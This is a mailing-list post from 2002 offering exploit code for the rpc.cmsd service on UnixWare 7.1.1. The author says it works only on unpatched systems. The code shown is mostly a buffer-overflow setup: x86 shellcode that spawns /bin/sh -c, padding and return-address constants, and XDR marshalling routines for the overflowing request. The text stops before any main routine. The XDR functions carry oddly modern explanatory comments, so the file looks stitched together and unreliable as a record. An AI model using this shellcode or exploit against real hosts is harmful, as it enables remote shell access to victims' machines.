
Unixware 7.1.1 rpc.cmsd remote exploit code.


From: jGgM. <jggm () mail com>
Date: 10 Jan 2002 04:40:54 -0000



Hi, I'm jGgM.

Here is Unixware 7.1.1 rpc.cmsd remote exploit code.
This is an old bug (currently patched, maybe).
This works only on unpatched Unixware 7.1.1.

--------------------------------------
Korean security Info.. by jGgM.
http://www.forsecure.com/
http://www.netemperor.com/
--------------------------------------
/*
 * Unixware 7.x rpc.cmsd exploit by jGgM
 * http://www.netemperor.com/en/
 * EMail: jggm () mail com
 */

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <rpc/rpc.h>

#define CMSD_PROG 100068
#define CMSD_VERS 4
#define CMSD_PROC 21

#define BUFFER_SIZE     1036
#define SHELL_START     1024
#define RET_LENGTH      12
#define ADJUST          100
#define NOP     0x90
#define LEN             68

char shell[] =
  /*  0 */ "\xeb\x3d"                         /* jmp springboard 
[2000]*/
  /* syscall:                                                    [2000]*/
  /*  2 */ "\x9a\xff\xff\xff\xff\x07\xff"     /* lcall 0x7,0x0   
[2000]*/
  /*  9 */ "\xc3"                             /* ret             [2000]*/
  /* start:                                                      [2000]*/
  /* 10 */ "\x5e"                             /* popl %esi       
[2000]*/
  /* 11 */ "\x31\xc0"                         /* xor %eax,%eax   
[2000]*/
  /* 13 */ "\x89\x46\xbf"                     /* movl %eax,-
0x41(%esi) */
  /* 16 */ "\x88\x46\xc4"                     /* movb %al,-0x3c
(%esi)  */
  /* 19 */ "\x89\x46\x0c"                     /* movl %eax,0xc
(%esi)   */
  /* 22 */ "\x88\x46\x17"                     /* movb %al,0x17
(%esi)   */
  /* 25 */ "\x88\x46\x1a"                     /* movb %al,0x1a
(%esi)   */
  /* 28 */ "\x88\x46\xff"                     /* movb %al,0x??
(%esi)   */
  /* execve:                                                     [2000]*/
  /* 31 */ "\x31\xc0"                         /* xor %eax,%eax   
[2000]*/
  /* 33 */ "\x50"                             /* pushl %eax      
[2000]*/
  /* 34 */ "\x56"                             /* pushl %esi      
[2000]*/
  /* 35 */ "\x8d\x5e\x10"                     /* leal 0x10(%
esi),%ebx  */
  /* 38 */ "\x89\x1e"                         /* movl %ebx,(%
esi)[2000]*/
  /* 40 */ "\x53"                             /* pushl %ebx      
[2000]*/
  /* 41 */ "\x8d\x5e\x18"                     /* leal 0x18(%
esi),%ebx  */
  /* 44 */ "\x89\x5e\x04"                     /* movl %ebx,0x4
(%esi)   */
  /* 47 */ "\x8d\x5e\x1b"                     /* leal 0x1b(%
esi),%ebx  */
  /* 50 */ "\x89\x5e\x08"                     /* movl %ebx,0x8
(%esi)   */
  /* 53 */ "\xb0\x3b"                         /* movb $0x3b,%al  
[2000]*/
  /* 55 */ "\xe8\xc6\xff\xff\xff"             /* call syscall    
[2000]*/
  /* 60 */ "\x83\xc4\x0c"                     /* addl $0xc,%
esp  [2000]*/
  /* springboard:                                                [2000]*/
  /* 63 */ "\xe8\xc6\xff\xff\xff"             /* call start      
[2000]*/
  /* data:                                                       [2000]*/
  /* 68 */ "\xff\xff\xff\xff"                 /* DATA            [2000]
*/
  /* 72 */ "\xff\xff\xff\xff"                 /* DATA            [2000]
*/
  /* 76 */ "\xff\xff\xff\xff"                 /* DATA            [2000]
*/
  /* 80 */ "\xff\xff\xff\xff"                 /* DATA            [2000]
*/
  /* 84 */ "\x2f\x62\x69\x6e\x2f\x73\x68\xff" /* 
DATA            [2000]*/
  /* 92 */ "\x2d\x63\xff";                    /* DATA            
[2000]*/

/*
 * Argument record handled by xdr_cm_send(): two C strings that are
 * marshalled in order (s1 first, then s2) with xdr_wrapstring().
 * Neither member carries an explicit length; the string contents are
 * whatever the caller stores here.
 */
struct cm_send {
   char *s1;   /* first string field, encoded/decoded by xdr_cm_send() */
   char *s2;   /* second string field, encoded/decoded by xdr_cm_send() */
};

/*
 * Result record handled by xdr_cm_reply(): a single integer marshalled
 * with xdr_int(). Its meaning is not established by this file.
 */
struct cm_reply {
   int i;   /* the only field; encoded/decoded by xdr_cm_reply() */
};

/*
 * XDR filter for struct cm_send.
 *
 * Processes the two string members in order with xdr_wrapstring(), in
 * whichever direction the XDR handle is set to.
 *
 * @param xdrs  XDR stream to encode to / decode from.
 * @param objp  Record whose s1 and s2 members are marshalled.
 * @return TRUE when both fields were handled; FALSE as soon as one
 *         xdr_wrapstring() call fails (the remaining field is skipped).
 */
bool_t xdr_cm_send(XDR *xdrs, struct cm_send *objp)
{
   /* Short-circuit && yields exactly TRUE (1) or FALSE (0) and stops at
    * the first failing field, mirroring the sequential early-return form. */
   return xdr_wrapstring(xdrs, &objp->s1) &&
          xdr_wrapstring(xdrs, &objp->s2);
}

/*
 * XDR filter for struct cm_reply.
 *
 * Marshals the single integer member with xdr_int().
 *
 * @param xdrs  XDR stream to encode to / decode from.
 * @param objp  Record whose i member is marshalled.
 * @return TRUE if xdr_int() succeeded, FALSE otherwise.
 */
bool_t xdr_cm_reply(XDR *xdrs, struct cm_reply *objp)
{
   bool_t ok = xdr_int(xdrs, &objp->i);

   /* Normalise to the canonical TRUE/FALSE values regardless of what
    * non-zero value xdr_int() reports on success. */
   return ok ? TRUE : FALSE;
}



